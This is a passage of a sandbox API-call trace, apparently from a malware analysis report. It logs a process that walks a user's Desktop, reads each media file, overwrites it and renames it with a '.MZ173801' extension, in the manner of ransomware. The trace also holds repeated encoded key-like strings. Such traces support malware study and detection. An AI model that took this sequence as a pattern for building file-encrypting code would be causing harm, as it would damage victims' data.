cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.144] GetCurrentThreadId () returned 0x1358 [0123.144] GetCurrentThreadId () returned 0x1358 [0123.144] GetCurrentThreadId () returned 0x1358 [0123.144] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hrJq.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\hrjq.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.144] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.144] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.144] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x82ef [0123.144] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.144] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x82ef, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x82ef, lpOverlapped=0x0) returned 1 [0123.145] CloseHandle (hObject=0x410) returned 1 [0123.146] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hrJq.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\hrjq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.147] WriteFile (in: hFile=0x410, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x82ef, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f9bc*=0x82ef, lpOverlapped=0x0) returned 1 [0123.149] CloseHandle (hObject=0x410) returned 1 [0123.149] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\hrJq.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\hrjq.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\hrJq.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\hrjq.m4a.mz173801")) returned 1 [0123.149] GetCurrentThreadId () returned 0x1358 [0123.149] GetCurrentThreadId () returned 0x1358 [0123.149] GetCurrentThreadId () returned 0x1358 [0123.149] GetCurrentThreadId () returned 0x1358 [0123.149] GetCurrentThreadId () returned 0x1358 [0123.149] GetCurrentThreadId () returned 0x1358 [0123.149] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5f78b00, ftCreationTime.dwHighDateTime=0x1d5e82d, ftLastAccessTime.dwLowDateTime=0x85c27a20, ftLastAccessTime.dwHighDateTime=0x1d5e61e, ftLastWriteTime.dwLowDateTime=0x85c27a20, ftLastWriteTime.dwHighDateTime=0x1d5e61e, nFileSizeHigh=0x0, nFileSizeLow=0x1aeb, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="If9wR_2_gcr9llsoyR.gif", cAlternateFileName="IF9WR_~1.GIF")) returned 1 [0123.149] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.149] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\If9wR_2_gcr9llsoyR.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\if9wr_2_gcr9llsoyr.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5f78b00, ftCreationTime.dwHighDateTime=0x1d5e82d, ftLastAccessTime.dwLowDateTime=0x85c27a20, ftLastAccessTime.dwHighDateTime=0x1d5e61e, ftLastWriteTime.dwLowDateTime=0x85c27a20, ftLastWriteTime.dwHighDateTime=0x1d5e61e, nFileSizeHigh=0x0, nFileSizeLow=0x1aeb)) returned 1 [0123.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.150] GetCurrentThreadId () returned 0x1358 [0123.150] GetCurrentThreadId () returned 0x1358 [0123.150] GetCurrentThreadId () returned 0x1358 [0123.151] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.151] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.151] GetCurrentThreadId () returned 0x1358 [0123.151] GetCurrentThreadId () returned 0x1358 [0123.151] GetCurrentThreadId () returned 0x1358 [0123.151] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\If9wR_2_gcr9llsoyR.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\if9wr_2_gcr9llsoyr.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.151] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.151] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.151] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x1aeb [0123.151] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.151] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1aeb, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x1aeb, lpOverlapped=0x0) returned 1 [0123.152] CloseHandle (hObject=0x410) returned 1 [0123.152] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\If9wR_2_gcr9llsoyR.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\if9wr_2_gcr9llsoyr.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.153] WriteFile (in: hFile=0x410, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x1aeb, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x1aeb, lpOverlapped=0x0) returned 1 [0123.155] CloseHandle (hObject=0x410) returned 1 [0123.155] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\If9wR_2_gcr9llsoyR.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\if9wr_2_gcr9llsoyr.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\If9wR_2_gcr9llsoyR.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\if9wr_2_gcr9llsoyr.gif.mz173801")) returned 1 [0123.156] GetCurrentThreadId () returned 0x1358 [0123.156] GetCurrentThreadId () returned 0x1358 [0123.156] GetCurrentThreadId () returned 0x1358 [0123.156] GetCurrentThreadId () returned 0x1358 [0123.156] GetCurrentThreadId () returned 0x1358 [0123.156] GetCurrentThreadId () returned 0x1358 [0123.156] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ee4110, ftCreationTime.dwHighDateTime=0x1d5f09e, ftLastAccessTime.dwLowDateTime=0x3e4b08f0, ftLastAccessTime.dwHighDateTime=0x1d5eab6, ftLastWriteTime.dwLowDateTime=0x3e4b08f0, ftLastWriteTime.dwHighDateTime=0x1d5eab6, nFileSizeHigh=0x0, nFileSizeLow=0x996b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="JA9a6Ju2ZS4.mkv", cAlternateFileName="JA9A6J~1.MKV")) returned 1 [0123.156] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.156] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.156] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\JA9a6Ju2ZS4.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ja9a6ju2zs4.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ee4110, ftCreationTime.dwHighDateTime=0x1d5f09e, ftLastAccessTime.dwLowDateTime=0x3e4b08f0, ftLastAccessTime.dwHighDateTime=0x1d5eab6, ftLastWriteTime.dwLowDateTime=0x3e4b08f0, ftLastWriteTime.dwHighDateTime=0x1d5eab6, nFileSizeHigh=0x0, nFileSizeLow=0x996b)) returned 1 [0123.156] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.156] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.157] GetCurrentThreadId () returned 0x1358 [0123.157] GetCurrentThreadId () returned 0x1358 [0123.157] GetCurrentThreadId () returned 0x1358 [0123.157] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjR